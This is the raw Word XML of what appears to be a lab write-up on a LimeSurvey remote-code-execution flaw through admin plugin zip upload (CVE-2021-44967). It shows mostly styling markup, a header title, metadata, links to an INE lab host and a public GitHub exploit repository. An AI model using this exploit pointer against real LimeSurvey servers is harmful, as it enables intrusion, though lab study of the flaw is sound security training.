    <w:p w14:paraId="2135DDEE" w14:textId="77777777" w:rsidR="00AD62EB" w:rsidRDefault="00AD62EB" w:rsidP="00B758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DE924E" w14:textId="77777777" w:rsidR="00B7584E" w:rsidRDefault="00B758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519981" w14:textId="77777777" w:rsidR="00B7584E" w:rsidRDefault="00B7584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F57C95" w14:textId="77777777" w:rsidR="00B7584E" w:rsidRDefault="00B758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082251" w14:textId="77777777" w:rsidR="00AD62EB" w:rsidRDefault="00AD62EB" w:rsidP="00B7584E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6169B211" w14:textId="77777777" w:rsidR="00AD62EB" w:rsidRDefault="00AD62EB" w:rsidP="00B758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E8E743" w14:textId="77777777" w:rsidR="00B7584E" w:rsidRDefault="00B7584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68AD73" w14:textId="746FFE7D" w:rsidR="00B7584E" w:rsidRPr="00B7584E" w:rsidRDefault="00B7584E">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:rPr>
        <w:rFonts w:ascii="Algerian" w:hAnsi="Algerian"/>
        <w:b/>
        <w:bCs/>
        <w:sz w:val="36"/>
        <w:szCs w:val="36"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="00B7584E">
      <w:rPr>
        <w:rFonts w:ascii="Algerian" w:hAnsi="Algerian"/>
        <w:b/>
        <w:bCs/>
        <w:sz w:val="36"/>
        <w:szCs w:val="36"/>
      </w:rPr>
      <w:t xml:space="preserve">Admin Plugin content zip file upload and install </w:t>
    </w:r>
    <w:proofErr w:type="gramStart"/>
    <w:r w:rsidRPr="00B7584E">
      <w:rPr>
        <w:rFonts w:ascii="Algerian" w:hAnsi="Algerian"/>
        <w:b/>
        <w:bCs/>
        <w:sz w:val="36"/>
        <w:szCs w:val="36"/>
      </w:rPr>
      <w:t>RCE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4461FF" w14:textId="77777777" w:rsidR="00B7584E" w:rsidRDefault="00B758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091C8C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DAAED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421172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A2A"/>
    <w:rsid w:val="004F42F8"/>
    <w:rsid w:val="00506E0F"/>
    <w:rsid w:val="0066500B"/>
    <w:rsid w:val="00A26A2A"/>
    <w:rsid w:val="00AD62EB"/>
    <w:rsid w:val="00B7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57F017"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{4DB8893D-D7FC-4B7A-AEDC-419173BD1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1"/>
        <w:szCs w:val="21"/>
        <w:lang w:val="en-IN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6E0F"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00506E0F"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="4" w:space="1" w:color="156082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6E0F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6E0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6E0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6E0F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6E0F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6E0F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6E0F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6E0F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E0F"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="0F4761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6E0F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6E0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6E0F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6E0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6E0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6E0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6E0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6E0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06E0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06E0F"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="0F4761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506E0F"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="0F4761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6E0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506E0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506E0F"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00506E0F"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00506E0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06E0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06E0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06E0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6E0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6E0F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506E0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506E0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506E0F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506E0F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506E0F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06E0F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B758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B7584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758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584E"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B758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58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3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34491">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="300"/>
          <w:marBottom w:val="30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96365527">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="300"/>
          <w:marBottom w:val="30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23790150">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="300"/>
          <w:marBottom w:val="30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cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44967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hyperlink" Target="http://demo.ine.local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hyperlink" Target="http://demo.ine.local/admi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LimeSurvey/LimeSurve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hyperlink" Target="https://github.com/Y1LD1R1M-1337/Limesurvey-RCE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711</Words>
  <Characters>4058</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>33</Lines>
  <Paragraphs>9</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>4760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JAYAPRAWIN BLASTER</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>JAYAPRAWIN BLASTER</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-05-21T13:53:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-21T13:54:00Z</dcterms:modified>
</cp:coreProperties>
</file>